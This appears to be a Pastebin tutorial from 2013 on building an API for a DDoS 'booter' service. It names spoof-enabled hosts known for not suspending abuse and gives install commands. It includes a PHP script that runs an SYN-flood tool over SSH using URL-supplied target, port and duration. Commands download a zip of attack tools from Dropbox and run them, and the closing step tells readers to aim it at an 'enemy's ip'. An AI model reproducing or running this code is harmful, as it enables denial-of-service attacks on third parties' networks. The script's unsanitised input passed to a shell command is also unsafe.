Advertisement
Guest User

Booter API

a guest
Dec 27th, 2013
4,296
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.67 KB | None | 0 0
  1.  
  2. Step 1, (Getting the servers)Have you ever owned a booter and wanted a stead flow of power but are constantly letdown by the sad apis on the market today?
  3. Well I'm going to teach you to make your own api for your booter/stresser.
  4.  
  5. Buying a server:
  6. There are many providers out there who have spoof enabled such as:
  7. Ecatel - http://ecatel.info
  8. Netrouting - http://netrouting.com
  9. Limehost - http://limehost.ro
  10. Goweb - http://goweb.de
  11.  
  12. Ecatel is the most known one because they do not suspend.
  13. You will need to pick a server for your api.
  14.  
  15.  
  16. Step 2. (Setting up SSH2)
  17. You will need to follow the following instructions for setting it up on a dedicated server.
  18.  
  19. Firstly, we’re going to install the php:
  20. Code:
  21. yum install php -y
  22.  
  23. Second, we’re going to install the dependencies:
  24. Code:
  25. yum install gcc php-devel php-pear libssh2 libssh2-devel
  26.  
  27. These will allow us to build the SSH2 extension using pecl.
  28.  
  29. Code:
  30. pecl install -f ssh2
  31.  
  32. After running that command, it should stop at a line like:
  33.  
  34. Code:
  35. ..done: 22,740 bytes
  36. 5 source files, building
  37. running: phpize
  38. Configuring for:
  39. PHP Api Version: 20041225
  40. Zend Module Api No: 20060613
  41. Zend Extension Api No: 220060519
  42. libssh2 prefix? [autodetect] :
  43.  
  44. All you have to do is hit Enter and it should detect the proper path. Once the install is completed, you just have to tell PHP to load the extension when it boots.
  45.  
  46. Code:
  47. touch /etc/php.d/ssh2.ini
  48.  
  49. Code:
  50. echo extension=ssh2.so > /etc/php.d/ssh2.ini
  51.  
  52. Now restart your webserver and test to see if the changes took effect.
  53.  
  54. Code:
  55. /etc/init.d/httpd restart
  56.  
  57. To check if you have installed ssh2 correctly type:
  58.  
  59. Code:
  60. php -m | grep ssh2
  61.  
  62. You should get a line returned with ‘ssh2′.
  63.  
  64.  
  65. Step 3 (Uploading Attack Scripts and API)
  66.  
  67. First you want to upload your php script to the following directory
  68.  
  69. Code:
  70. cd /var/www/html
  71.  
  72. Code:
  73. nano api.php
  74.  
  75. Second you will need to copy the following code below then past it by right clicking in cmd.
  76.  
  77. Code:
  78. <?php
  79. set_time_limit(0);
  80. ignore_user_abort(true);
  81.  
  82. if (!function_exists("ssh2_connect")) die("function ssh2_connect doesn't exist");
  83. // log in at server1.example.com on port 22
  84. if(!($con = ssh2_connect("99.99.99.99", 22))){
  85. echo "fail: unable to establish connection\n";
  86. } else {
  87. // try to authenticate with username root, password secretpassword
  88. if(!ssh2_auth_password($con, "root", "password")) {
  89. echo "fail: unable to authenticate\n";
  90. } else {
  91.  
  92. // execute a command
  93. if (!($stream = ssh2_exec($con, "/root/ssyn ".$_GET['host']." ".$_GET['port']." ".$_GET['time']))) {
  94. echo "fail: unable to execute command\n";
  95. } else {
  96. echo "" . stream_get_contents($stream);
  97.  
  98. echo "attack sent.";
  99. }
  100. }
  101. }
  102. ?>
  103.  
  104. After pasting the code you will need to edit the script by replacing the ip with yours the username with yours and the password with yours.
  105.  
  106. Once you have edited the script and replaced the following listed above you will then press ctrl+x and save it.
  107.  
  108. After saving it you will need to download the attack scripts to your root folder.
  109.  
  110. Code:
  111. cd /root
  112. Then:
  113. Code:
  114. wget http://dl.dropbox.com/u/64563206/scripts.zip
  115. Then:
  116. Code:
  117. unzip scripts.zip
  118. Then:
  119. Code:
  120. chmod +x rudy slow ssyn udplag 50x arme ghp list.txt proxies.txt
  121. Then:
  122. Code:
  123. ./ssyn 109.210.235.256 80 10 o
  124.  
  125.  
  126. Step 4 (Final Step)
  127.  
  128. Time to test her out:
  129. Type in Browser:
  130. Code:
  131. http://Youripaddress/api.php?host=1.1.1.1&port=80&time=100
  132. Replace the 1.1.1.1 with you enemy's ip.
  133. Replace Youripaddress with your server ip.
  134.  
  135.  
  136.  
  137. Thats all. If I have made any errors please contact me so I can fix them. If you need help feel free to pm me for assistance.
  138.  
  139. Thank You,
  140.  
  141. ViRaLL
  142. Find Quote Report
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement